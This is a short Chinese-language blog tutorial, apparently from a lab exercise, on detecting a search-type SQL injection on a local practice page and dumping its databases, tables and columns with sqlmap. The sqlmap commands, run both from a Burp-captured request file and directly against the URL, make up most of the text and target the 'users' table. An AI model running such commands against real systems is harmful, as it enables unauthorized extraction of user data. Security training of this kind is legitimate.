验证是否有注入
我们直接输入一个字符k
,点击搜索。
提示未见异常
我们输入关键字%k%
效果如下:
此时,我们可以得出,存在搜索型注入漏洞
攻击方式一
利用burp
抓包,将包中的文件另存为22.txt
将22.txt
放到sqlmap
根目录
/usr/share/sqlmap
爆出数据库
sqlmap -r "22.txt" --dbs
爆出表
sqlmap -r "22.txt" -D lou --tables
爆出表结构
sqlmap -r "22.txt" -D lou -T users --columns
方式二
不需要抓包保存文件的形式,直接执行命令
sqlmap -u http://192.168.123.129/vul/sqli/sqli_search.php? --data "name=*&submit=%E6%90%9C%E7%B4%A2" --dbs
版权属于:逍遥子大表哥
本文链接:https://blog.bbskali.cn/940.html
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
此处评论已关闭